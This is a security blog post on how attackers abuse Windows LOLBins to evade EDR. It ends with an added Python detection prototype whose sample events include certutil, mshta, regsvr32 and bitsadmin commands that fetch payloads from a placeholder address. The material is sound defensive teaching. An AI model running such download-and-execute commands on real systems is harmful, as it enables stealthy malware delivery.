November 16, 2023
Over the years, the security scene has been characterized by a cat-and-mouse game between red teamers and blue teamers. Increasingly sophisticated attack techniques have led to an equally sophisticated response in terms of endpoint detection and response (EDR) systems, endpoint protection platforms (EPPs) and antivirus software.
Because of this evolution, red teamers need to step up their game to keep an edge over the blue team, to match the sophistication of real-world adversaries and, in general, to stay relevant. They need to be quieter, so that their activity blends in with legitimate system and network activity.
One effective way to stay quiet is to use native binaries that ship with the operating system, also known as LOLBins (living off the land binaries). Because these binaries are signed by the OS vendor and are present on every host, they are implicitly trusted, and red teamers can repurpose some of their functionality. This blog post explains why LOLBin abuse matters to both sides.
LOLBins derive from the idea of "living off the land," which means compromising a system using only the tools already present in the operating system. Applying this concept, adversaries and red teamers keep a low profile because they do not install new tools or drop new files that would leave a revealing audit trail. Instead, they use the functionality of native binaries beyond its intended purpose. Many LOLBin techniques also work from a standard user context, so an adversary can make progress without first escalating to administrator privileges.
Because LOLBin activity is difficult to distinguish from legitimate activity, it poses a real challenge to blue teamers. In practice, blue teamers do not always monitor these binaries, or they track only the most well-known ones. Windows ships with a large number of native binaries, and their full capabilities are not always documented. A newly discovered LOLBin therefore behaves much like a zero-day from a detection standpoint, at least until it is documented and detection rules catch up.
To document and track newly discovered LOLBins, the security community maintains the LOLBAS project (Living Off The Land Binaries, Scripts and Libraries). By recording both the discovered offensive capabilities and the related TTPs (tactics, techniques and procedures), the project provides essential reference material for red teamers and blue teamers alike. Cross-referencing LOLBAS entries with the MITRE ATT&CK framework lets organizations analyze their security gaps more deeply and assess security solutions more thoroughly.
The concept behind LOLBins represents a significant shift in the security game. Recent examples show advanced persistent threat (APT) groups and other malicious actors increasingly using native binaries to avoid detection while delivering malware and ransomware. While this opens interesting avenues for red teamers, it also makes blue teamers' jobs harder.
These industry shifts add more weight to the argument that organizations should treat security as a mindset rather than a product. Breaches often happen because organizations rely too heavily on off-the-shelf solutions, assuming such products give them complete visibility into what happens on their network.
If organizations do not account for attackers abusing LOLBins to achieve their goals, the result is blind spots in corporate networks that often allow attackers to go undetected for long periods.
Because these native binaries are signed by known vendors and ship with the operating system itself, LOLBins challenge traditional endpoint detection and response (EDR) solutions when it comes to signature-based detection: there is no malware signature to match, and the binary itself looks legitimate. More recently, most EDR solutions have started adding behavioral factors (for example, asking why someone in the accounting department needs to RDP to the domain controller). To approach security with this zero-trust mindset, security practitioners should invest time and resources in researching new potential LOLBins, including the command-line patterns and parent-child process relationships that distinguish abuse from normal use. Equipped with that information, security teams can proactively implement appropriate defenses and monitoring.
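The following is an added example, not code from the original post or from Optiv, of what such behavioral monitoring looks like in practice: a small detection prototype that runs over Sysmon-style process-creation events and flags LOLBin abuse in two ways, by command-line patterns documented in the LOLBAS project (certutil, mshta, rundll32, regsvr32, bitsadmin, msiexec) and by a parent-child rule for Office applications spawning any watched binary. The event records, the host paths, the user name and the 203.0.113.10 address are constructed sample data, the rule names are arbitrary, and the regexes are illustrative starting points that need tuning to an environment before being treated as production detections.

```python
"""Prototype LOLBin detection over Sysmon-style process-creation events.

Added example (not from the original post). Rules are keyed on command-line
patterns documented by the LOLBAS project; all sample data is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str        # MITRE ATT&CK ID, or "behavioral" for parent/child logic
    image: str
    command_line: str


# (executable basename, rule name, command-line regex, ATT&CK technique)
COMMAND_LINE_RULES = [
    ("certutil.exe", "certutil-url-download",
     re.compile(r"-urlcache\b.*\bhttps?://", re.I), "T1105"),
    ("mshta.exe", "mshta-remote-or-inline-script",
     re.compile(r"\bhttps?://|\b(javascript|vbscript):", re.I), "T1218.005"),
    ("rundll32.exe", "rundll32-inline-script",
     re.compile(r"\b(javascript|vbscript):", re.I), "T1218.011"),
    ("regsvr32.exe", "regsvr32-scriptlet",
     re.compile(r"/i:\s*https?://|\bscrobj\.dll\b", re.I), "T1218.010"),
    ("bitsadmin.exe", "bitsadmin-transfer",
     re.compile(r"/transfer\b.*\bhttps?://", re.I), "T1197"),
    ("msiexec.exe", "msiexec-remote-package",
     re.compile(r"/(i|package)\s+https?://", re.I), "T1218.007"),
]

# Behavioral rule: an Office application launching a LOLBin is rarely legitimate,
# regardless of what the command line looks like.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WATCHED_CHILDREN = {binary for binary, *_ in COMMAND_LINE_RULES} | {
    "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list[Alert]:
    """Return every alert a single process-creation event triggers."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    alerts = []
    for binary, name, pattern, technique in COMMAND_LINE_RULES:
        if image == binary and pattern.search(cmd):
            alerts.append(Alert(name, technique, image, cmd))
    if parent in OFFICE_PARENTS and image in WATCHED_CHILDREN:
        alerts.append(Alert("office-spawned-lolbin", "behavioral", image, cmd))
    return alerts


def scan(events) -> list[Alert]:
    """Run detect() over an iterable of events and collect all alerts."""
    return [alert for event in events for alert in detect(event)]


# Constructed Sysmon Event ID 1 records (hypothetical hosts, user and URLs).
# Events 3 and 4 (zero-based) are benign uses of the same binaries.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://203.0.113.10/a.hta",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\admin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority high http://203.0.113.10/t.bin C:\Users\Public\t.bin",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": r"CORP\jdoe"},
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.technique}] {alert.rule}: {alert.command_line}")
```

On the constructed sample, the first event fires twice (the certutil download pattern and the Office parent-child rule), the mshta, regsvr32 and bitsadmin events fire once each, and the two benign invocations of rundll32 and certutil produce nothing, which is the property to preserve when extending the rule set: match on how a binary is being used, not merely on the binary running.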
Here are some key takeaways that you should keep in mind when it comes to LOLBins.